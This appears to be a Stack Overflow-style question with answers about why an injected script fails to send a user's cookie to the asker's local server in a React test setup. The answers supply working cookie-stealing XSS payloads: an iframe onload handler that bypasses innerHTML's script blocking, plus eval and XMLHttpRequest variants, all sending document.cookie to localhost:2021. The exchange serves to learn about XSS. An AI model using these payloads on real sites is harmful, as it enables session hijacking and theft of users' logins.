# Why does this xss script not call my server?

Tags: javascript, xss

I am learning about xss attacks in order to have a better understanding of application security. I am trying to perform a basic task: get the user cookie on my own local website and send it to my local server.

I have managed to retrieve a cookie with an alert. But I can't perform an api call. What is wrong with this:

React app:

```js
<p dangerouslySetInnerHTML={{
  __html: `<script type="text/javascript">
           document.location='http://localhost:2021/xss?user='+document.cookie;
           </script>`,
}}
/>
```

On my server:

```js
const app = require("express")();
const cors = require("cors");
app.use(cors());

app.get("/xss", (req, res) => {
const {user} = req.query
  res.send("it works", user);
});

app.listen(2021, () =>
  console.log("Server is waiting to read yummy cookies")
);
```

The /xss route is never called.

Comment: Ok, then why are React app vulnerable? I thought I was supposed to never use setDangerousInnerHtml because it would allow xss attack. But if I can't send any info to a remote server, the only way to really hack the website would be to have access to the user's computer, right?  If it is possible to send the cookie to a server, how should I do it? Also thanks for the edit of the question's title, I made a stupid mistake. EDIT: I've seen your answer below, thanks!

Answer (score 1, accepted):

Setting innerHTML does not execute a script.

```js
document.getElementById("container").innerHTML=`<script>alert("hello")<\/script>Nothing happens`
```

```html
<div id="container"></div>
```

Try this one instead

```
<div dangerouslySetInnerHTML={{
  __html: `<iframe onload="document.location='http://localhost:2021/xss?user='+document.cookie;"></iframe>`,
}}
/>
```

Answer (score 0):

I really don't know what you are trying to do. But creating a script tag like that should not be your solution. The problem is that the JavaScript does not get invoked because it is not set as JavaScript. You are just creating a text node inside of the  tag. When you want to invoke JavaScript from a string you can use the `eval` function (which I would **NOT** recommend due to security complications). But anyways here is now you can use it:

```js
const script = `document.location='http://localhost:2021/xss?user='+document.cookie;`;
eval(script);
```

But still: **don't do that!!!**

You can maybe refer to deliver the JavaScript file from a server and use the `src` attribute to load it.

When you just want to invoke the HTTP request your can use XHR. Detailed information to that topic you can find [here](https://developer.mozilla.org/en-US/docs/Web/API/XMLHttpRequest/Using_XMLHttpRequest). But in short:

```js
const xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:2021/xss?user=' + document.cookie);
xhr.send();
```

That should do the job without security complications.